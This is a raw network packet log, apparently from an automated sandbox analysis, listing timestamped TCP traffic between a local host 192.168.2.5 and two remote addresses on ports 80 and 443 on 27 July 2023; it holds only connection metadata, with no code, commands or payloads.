Jul 27, 2023 01:35:38.167924881 CEST	50310	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.212862015 CEST	80	50310	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.217535019 CEST	80	50310	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.217638016 CEST	50310	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.237198114 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.237235069 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.237246990 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.237277031 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.237339973 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.237364054 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.237381935 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.238014936 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238027096 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238106012 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.238111973 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238127947 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238151073 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238172054 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.238176107 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238193035 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238204956 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.238217115 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.238234043 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.285412073 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.336982965 CEST	50310	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.337882996 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.382642984 CEST	80	50311	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.382776022 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.382926941 CEST	80	50310	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.383009911 CEST	50310	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.383286953 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.402718067 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402738094 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402784109 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402817965 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402837038 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402856112 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402858019 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.402879953 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402904987 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.402910948 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.402970076 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.402982950 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.403033972 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.428030014 CEST	80	50311	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.431663036 CEST	80	50311	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.431787014 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.445020914 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.445061922 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.445189953 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.445215940 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.445276976 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.536516905 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.537391901 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.569879055 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.569931030 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.569983959 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570003986 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570028067 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570056915 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570291042 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570314884 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570365906 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570380926 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570415020 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570446968 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570787907 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570827007 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570879936 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570895910 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.570919991 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.570946932 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.571299076 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.571327925 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.571379900 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.571393967 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.571415901 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.571446896 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.581690073 CEST	80	50311	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.582010984 CEST	50311	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.583472967 CEST	80	50312	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.583576918 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.589947939 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.613043070 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613089085 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613188028 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.613200903 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613219976 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613235950 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.613245964 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613275051 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.613311052 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.613322973 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.613374949 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.635679960 CEST	80	50312	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.638740063 CEST	80	50312	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.638849974 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.738517046 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.738557100 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.738642931 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.738670111 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.738688946 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.738717079 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.738758087 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.738970995 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739005089 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739089012 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.739099026 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739250898 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739288092 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739319086 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.739327908 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.739353895 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.740972042 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.740998983 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741110086 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741137028 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741152048 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741174936 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741183996 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741226912 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741235018 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741281986 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741292000 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741305113 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741349936 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741359949 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741375923 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741393089 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741403103 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741424084 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741434097 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741445065 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.741457939 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.741486073 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.757608891 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.758589029 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.778043032 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778081894 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778194904 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778213024 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778254032 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778285980 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778479099 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778515100 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778579950 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778588057 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778614998 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778630018 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778640032 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778656960 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778661966 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778691053 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778700113 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778713942 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778740883 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778908014 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778937101 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.778980017 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.778990984 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.779046059 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.779071093 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.802454948 CEST	80	50312	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.802561998 CEST	80	50313	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.802587986 CEST	50312	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.802726984 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.812973976 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.856980085 CEST	80	50313	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.861004114 CEST	80	50313	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:38.861078978 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.904932976 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.904980898 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.905049086 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.905065060 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.905097008 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.905138969 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.905391932 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.905431986 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.905461073 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.905471087 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.905505896 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.905520916 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906074047 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906111956 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906162977 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906173944 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906193972 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906224012 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906230927 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906251907 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906254053 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906277895 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906374931 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906514883 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906542063 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906590939 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906599998 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906618118 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906652927 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906816959 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906851053 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906891108 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906899929 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.906919956 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.906945944 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907151937 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907186985 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907213926 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907223940 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907253027 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907282114 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907407999 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907437086 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907470942 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907480955 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.907519102 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.907533884 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.943716049 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.943759918 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.943866014 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.943882942 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.943943024 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.944484949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944516897 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944577932 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.944591045 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944610119 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.944614887 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944638014 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.944654942 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944674969 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.944678068 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.944721937 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.945185900 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.945216894 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.945266008 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.945278883 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:38.945327997 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.945327997 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:38.977787971 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:38.978745937 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.022578955 CEST	80	50313	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.022699118 CEST	50313	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.023328066 CEST	80	50314	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.023442984 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.023962975 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.069478035 CEST	80	50314	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.070805073 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.070844889 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.070992947 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.071012020 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.071286917 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.071326017 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.071372986 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.071386099 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.071408033 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.071449995 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.073237896 CEST	80	50314	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.073304892 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.073338032 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.073429108 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.073442936 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.073472977 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.073472977 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.073497057 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.073998928 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074037075 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074098110 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074109077 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074157953 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074486971 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074516058 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074572086 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074584961 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074600935 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074619055 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074635983 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074636936 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074656010 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074701071 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074745893 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074846983 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074873924 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074920893 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074929953 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.074966908 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.074996948 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.075124979 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075160027 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075200081 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.075208902 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075249910 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.075515032 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075546980 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075597048 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.075608969 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.075644970 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.075676918 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.080318928 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.110311985 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.110404015 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.110496044 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.110589981 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.110757113 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.110790968 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.110836029 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.110851049 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.110929966 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.110929966 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.111571074 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111604929 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111649036 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.111665010 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111685991 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111689091 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.111720085 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.111725092 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111743927 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.111758947 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.111807108 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.205421925 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.211678028 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.236875057 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.236908913 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.237035036 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.237056017 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.237335920 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.237368107 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.237415075 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.237426996 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.237454891 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.237487078 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.239038944 CEST	443	50304	108.181.20.35	192.168.2.5
